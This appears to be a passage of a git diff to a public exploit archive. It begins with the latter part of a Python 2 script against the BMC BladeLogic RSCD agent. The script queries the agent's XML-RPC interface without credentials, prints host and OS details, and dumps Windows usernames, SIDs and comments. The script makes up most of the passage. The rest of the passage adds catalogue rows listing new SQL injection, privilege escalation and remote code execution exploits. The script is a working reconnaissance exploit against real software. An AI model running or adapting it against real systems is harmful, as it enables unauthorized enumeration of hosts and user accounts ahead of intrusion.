+HOST = options.host
+
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock.connect((HOST, PORT))
+
+sock.sendall("TLSRPC")
+
+wrappedSocket = ssl.wrap_socket(sock)
+
+adapter = MyAdapter()
+s = requests.session()
+s.mount("http://", adapter)
+
+print "Sending intro..."
+r = s.post('http://'+HOST+':'+str(PORT)+'/xmlrpc', data=init)
+
+print "Getting version..."
+r = s.post('http://'+HOST+':'+str(PORT)+'/xmlrpc', data=getVersion)
+
+rootVersion = ET.fromstring(r.content)
+print "========================="
+print "Major version   : " + rootVersion[0][0][0][0][0][1].text
+print "Minor version   : " + rootVersion[0][0][0][0][1][1].text
+print "Patch version   : " + rootVersion[0][0][0][0][2][1].text
+print "Platform version: " + rootVersion[0][0][0][0][3][1].text
+print "=========================\n"
+
+print "Getting host overview..."
+r = s.post('http://'+HOST+':'+str(PORT)+'/xmlrpc', data=getHostOverview)
+
+rootOverview = ET.fromstring(r.content)
+print rootOverview[0][0][0][0][12][1].text
+
+linux = False
+
+if rootOverview[0][0][0][0][0][1].text is not None:
+    linux = True
+
+print "=================================================="
+print "Agent instal dir: " + rootOverview[0][0][0][0][1][1].text
+print "Licensed?       : " + ("false" if (int(rootOverview[0][0][0][0][2][1][0].text) == 0) else "true")
+print "Repeater?       : " + ("false" if (int(rootOverview[0][0][0][0][12][1][0].text) == 0) else "true")
+print "Hostname        : " + rootOverview[0][0][0][0][6][1].text
+print "Netmask         : " + rootOverview[0][0][0][0][13][1].text
+print "CPU architecture: " + rootOverview[0][0][0][0][10][1].text
+print "Platform (OS)   : " + rootOverview[0][0][0][0][14][1].text
+print "OS version      : " + rootOverview[0][0][0][0][15][1].text
+print "OS architecture : " + rootOverview[0][0][0][0][3][1].text
+print "OS release      : " + rootOverview[0][0][0][0][11][1].text
+print "Patch level     : " + rootOverview[0][0][0][0][7][1].text
+print "==================================================\n"
+
+print "Sending request for users...\n"
+
+r = s.post('http://'+HOST+':'+str(PORT)+'/xmlrpc', data=getWindowsUsers)
+
+with open("./users.xml", "w") as text_file:
+    text_file.write(r.content)
+
+root = ET.parse('./users.xml').getroot()
+count = 0
+ind = 1
+while ind:
+    try:
+        ind = root[0][0][0][0][0][count][0][14][1].text
+    except IndexError:
+        pass
+        break
+    count += 1
+
+print "Number of users found: " + str(count) + "\n"
+for i in range(0, count):
+        print "Username: "+ root[0][0][0][0][0][i][0][14][1].text
+        print "SID: "     + root[0][0][0][0][0][i][0][12][1].text
+        print "Comment: " + root[0][0][0][0][0][i][0][2][1].text
+
+        print "........................\n"
+
+
+wrappedSocket.close()
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -5482,6 +5482,7 @@ id,file,description,date,author,type,platform,port
 43903,exploits/multiple/dos/43903.txt,"Artifex MuJS 1.0.2 - Denial of Service",2018-01-28,"Andrea Sindoni",dos,multiple,
 43904,exploits/multiple/dos/43904.txt,"Artifex MuJS 1.0.2 - Integer Overflow",2018-01-28,"Andrea Sindoni",dos,multiple,
 43923,exploits/macos/dos/43923.c,"macOS - 'sysctl_vfs_generic_conf' Stack Leak Through Struct Padding",2018-01-29,"Google Security Research",dos,macos,
+43930,exploits/windows/dos/43930.py,"LabF nfsAxe 3.7 TFTP Client - Local Buffer Overflow",2018-01-30,"Miguel Mendez Z",dos,windows,
 41643,exploits/hardware/dos/41643.txt,"Google Nest Cam 5.2.1  - Buffer Overflow Conditions Over Bluetooth LE",2017-03-20,"Jason Doyle",dos,hardware,
 41645,exploits/windows/dos/41645.txt,"Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc / nt!ExpFindAndRemoveTagBigPages (MS17-017)",2017-03-20,"Google Security Research",dos,windows,
 41646,exploits/windows/dos/41646.txt,"Microsoft Windows - Uniscribe Font Processing Out-of-Bounds Read in usp10!otlChainRuleSetTable::rule (MS17-011)",2017-03-20,"Google Security Research",dos,windows,
@ -9302,6 +9303,7 @@ id,file,description,date,author,type,platform,port
 43775,exploits/linux/local/43775.c,"glibc - 'getcwd()' Local Privilege Escalation",2018-01-16,halfdog,local,linux,
 43925,exploits/macos/local/43925.rb,"Arq 5.10 - Local Privilege Escalation (1)",2018-01-29,"Mark Wadham",local,macos,
 43926,exploits/macos/local/43926.sh,"Arq 5.10 - Local Privilege Escalation (2)",2018-01-29,"Mark Wadham",local,macos,
+43929,exploits/windows/local/43929.c,"System Shield 5.0.0.136 - Privilege Escalation",2018-01-30,"Parvez Anwar",local,windows,
 41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
 41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
 41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
@ -15973,6 +15975,7 @@ id,file,description,date,author,type,platform,port
 43902,exploits/multiple/remote/43902.py,"BMC BladeLogic 8.3.00.64 - Remote Command Execution",2018-01-26,"Paul Taylor",remote,multiple,
 43920,exploits/linux/remote/43920.py,"Trend Micro Threat Discovery Appliance 2.6.1062r1 - 'dlp_policy_upload.cgi' Remote Code Execution",2018-01-28,mr_me,remote,linux,
 43924,exploits/multiple/remote/43924.rb,"Oracle WebLogic - wls-wsat Component Deserialization Remote Code Execution (Metasploit)",2018-01-29,Metasploit,remote,multiple,
+43927,exploits/windows/remote/43927.txt,"HPE iMC 7.3 - RMI Java Deserialization",2018-01-30,"Chris Lyne",remote,windows,
 41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
 41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
 41679,exploits/linux/remote/41679.rb,"Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit)",2015-04-01,Metasploit,remote,linux,22
@ -37943,6 +37946,11 @@ id,file,description,date,author,type,platform,port
 43918,exploits/php/webapps/43918.txt,"Buddy Zone 2.9.9 - SQL Injection",2018-01-28,"Ihsan Sencan",webapps,php,
 43919,exploits/hardware/webapps/43919.html,"Netis WF2419 Router - Cross-Site Request Forgery",2018-01-28,"Sajibe Kanti",webapps,hardware,
 43922,exploits/nodejs/webapps/43922.html,"KeystoneJS < 4.0.0-beta.7 - Cross-Site Request Forgery",2018-01-28,"Saurabh Banawar",webapps,nodejs,
+43928,exploits/windows/webapps/43928.py,"Advantech WebAccess < 8.3 - SQL Injection",2018-01-30,"Chris Lyne",webapps,windows,
+43931,exploits/php/webapps/43931.txt,"Joomla! Component Picture Calendar for Joomla 3.1.4 - Directory Traversal",2018-01-30,"Ihsan Sencan",webapps,php,
+43932,exploits/php/webapps/43932.txt,"Joomla! Component CP Event Calendar 3.0.1 - 'id' SQL Injection",2018-01-30,"Ihsan Sencan",webapps,php,
+43933,exploits/php/webapps/43933.txt,"Joomla! Component Visual Calendar 3.1.3 - 'id' SQL Injection",2018-01-30,"Ihsan Sencan",webapps,php,
+43934,exploits/windows/webapps/43934.py,"BMC BladeLogic RSCD Agent 8.3.00.64 - Windows Users Disclosure",2018-01-30,"Paul Taylor",webapps,windows,4750
 41641,exploits/php/webapps/41641.txt,"Joomla! Component JooCart 2.x - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
 41642,exploits/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
 41644,exploits/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",webapps,php,80